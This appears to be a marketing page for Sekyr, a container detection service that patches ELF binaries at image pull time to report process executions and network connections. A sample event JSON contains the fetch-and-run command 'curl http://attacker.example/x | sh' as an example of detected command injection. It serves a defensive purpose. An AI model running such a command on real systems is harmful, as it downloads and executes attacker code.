Detection that travels with the image, not the host.
Sekyr is an OCI pull-through proxy. You keep pushing images to your own registry; your orchestrator pulls them through Sekyr. On the way through, we add one extra layer on top of the image. That layer holds patched copies of every ELF binary we found inside, plus a tiny reporter. The originals are still served unchanged. When a patched binary runs, that execution itself is the event. Our observation code records who is running (binary path, argv, parent process chain, non-sensitive env) and which network connections are active for that process, and ships it back to Sekyr. Nothing else runs on your hosts.
- Surface
- OCI Distribution Spec, pull only
- Footprint
- One added layer, ~few MB
- Mechanism
- Binary patching at pull time
- Runtime
- Agentless, runs only when patched binaries do
Where Sekyr sits.
A pull-through proxy that sits between your orchestrator and the upstream registry. You still push images to your own registry; your orchestrator pulls them through us. On first pull we analyze the image, patch every ELF binary we find, and ship the result back with one extra layer on top of the original. Repeat pulls hit the cache and pass through unchanged.
What happens on docker pull.
From the client's perspective, this is a normal OCI pull. Pushes still go to your upstream registry; we never accept them. Inside the cache, four steps run on first pull before the manifest is returned. Repeat pulls of the same digest are a cache hit. We do not touch signatures, do not check provenance against any allowlist, and do not modify your original layers.
- 01
Scan
Walk the image. Identify every ELF binary inside it: shells, package binaries under /usr/bin, busybox applets, language runtimes, anything that can be exec’d.
- 02
Patch
Add a small observation routine to each ELF binary in the image. The routine sits dormant until the binary is executed; when it is, the routine wakes up alongside the binary and forks a small reporter side-process that emits one event and exits.
- 03
Overlay
Wrap the patched copies and the reporter into a single extra layer on top of the existing image. Original layers are byte-for-byte unchanged. The entrypoint is not rewritten; signatures and provenance are not touched.
- 04
Deliver
Serve the original image plus our one added layer. Same OCI protocol, same digest verification. Subsequent pulls hit the content-addressed cache.
What runs at runtime. Almost nothing.
Sekyr is agentless. There is no daemon on the host, no PID 1 supervisor in the container, no syscall funnel. The patched binaries run as themselves. The execution of one of those binaries IS the event we care about; that is what wakes the observation code and triggers a small reporter side-process fork off, send one event, and exit. Long-running idle workloads cost nothing.
What we listen for.
No profiles, no allowlists, no learning windows. Every patched binary carries the same observation code, and every execution of one of those binaries produces an event with the same shape. What we record is below.
Who is running
For every execution we capture the binary path, argv, argv[0], and the parent PID chain back to PID 1. Command injection shows up here, like a webserver suddenly running /bin/sh -c, a cron spawning curl, or a database forking a shell.
Network connections
For the same execution, we record the network connections that process has open. Catches workloads reaching addresses they have no business reaching, like exfiltration destinations, C2 endpoints, or internal services they should never touch.
Process context
Parent PID chain and non-sensitive environment variables go out with each event. Lets you reconstruct who spawned what, even when the chain crosses several short-lived processes.
One event per hook hit.
Every event has the same shape: what happened, where it was called from, who its parent was. The control plane is a search and alerting view over those events.
{
"ts": "2026-04-26T14:22:08.412Z",
"workload": "api-7f9c8d6b4-x2k7l",
"image": "sekyr.cloud/ghcr/acme/api@sha256:f9c8d6b4...",
"event": "process.exec",
"exec": {
"path": "/bin/sh",
"argv": ["sh", "-c", "curl http://attacker.example/x | sh"],
"cwd": "/app"
},
"parents": [
{ "pid": 412, "comm": "sh", "exe": "/bin/sh" },
{ "pid": 411, "comm": "node", "exe": "/usr/local/bin/node" },
{ "pid": 1, "comm": "node", "exe": "/usr/local/bin/node" }
],
"env_safe": { "NODE_ENV": "production", "PORT": "8080" },
"site": { "binary": "/usr/local/bin/node", "offset": "0x4f12" }
}Reporters ship events to the Sekyr analysis engine. We filter aggressively at ingest and deduplicate events we have already seen for the same image and call site, so only real, novel signals enter the analysis pipeline. We run the behavioural detection on top, so you don’t pipe the raw stream into your own SIEM and you don’t hand-write detection rules. Findings surface in the control plane and via webhooks or the alerting destination of your choice.
What this costs you. Almost nothing, most of the time.
The honest version: we don't have hard numbers to publish yet, but the shape of the cost is structural, not a tuning exercise. Here is where it sits relative to the alternatives.
What we run on.
Sekyr speaks OCI on the pull path. You keep using your existing registry for pushes; if it implements the OCI Distribution Spec on read and your runtime implements OCI Runtime Spec, Sekyr fits in front of it.
Registries
- Docker Hub tested
- GitHub Container Registry tested
- AWS ECR tested
- Google Artifact Registry tested
- GitLab Container Registry tested
- Harbor compatible
- Quay.io compatible
- Self-hosted (any OCI dist) compatible
Orchestrators
- Kubernetes 1.24+ tested
- Amazon ECS tested
- Nomad 1.6+ compatible
- Docker / Compose tested
- OpenShift 4.x compatible
Architectures
- linux/amd64 tested
- linux/arm64 tested
- linux/arm/v7 compatible
- Distroless base images tested
- Alpine / musl tested
- Scratch images tested
Detection, not enforcement.
Sekyr is detection-only. We do not block, kill, or interfere with your workload; we just report. The list below is what we actually catch from observing binary executions, and what we deliberately don’t.
What we catch
- Command injection, where a process execs a shell with attacker-controlled argv
- Lateral movement, where workloads reach internal services they’ve never touched
- Suspicious exec chains, like webserver → sh → curl → sh, or other anomalous parents
- Unexpected outbound network dials to exfiltration destinations or C2 callbacks
- Living-off-the-land, where busybox or coreutils binaries get used inside an image that doesn’t normally need them
- Crypto-miner drop and run, where short-lived exec patterns betray payload delivery
What we don’t do
- We do not block, kill, or signal processes. Detection only.
- We do not catch attacks that never exec a binary or open a socket, so pure in-process memory corruption is invisible to us
- We do not see statically-linked binaries the cache wasn’t able to identify (rare, but possible)
- We do not protect against kernel-level exploits or rootkits; that is the host’s job
- We do not stop build-time supply chain attacks before the image reaches the registry
- We do not defend against malicious insiders with cluster-admin and event-pipeline rights
Sekyr vs eBPF / agent-based container monitors.
Falco-style stacks put a privileged agent on every host and watch the kernel. We put the hooks inside the image, only spend CPU when something interesting actually happens, and let the analysis side filter and deduplicate before anything else. Different place to stand, different cost shape.
Sekyr
Detection inside the image
eBPF + agent monitors
A daemon on every host, in the kernel
Read the docs. Pull an image. See what it does.
Start a free trial. No agent install, no orchestrator changes beyond a URL prefix.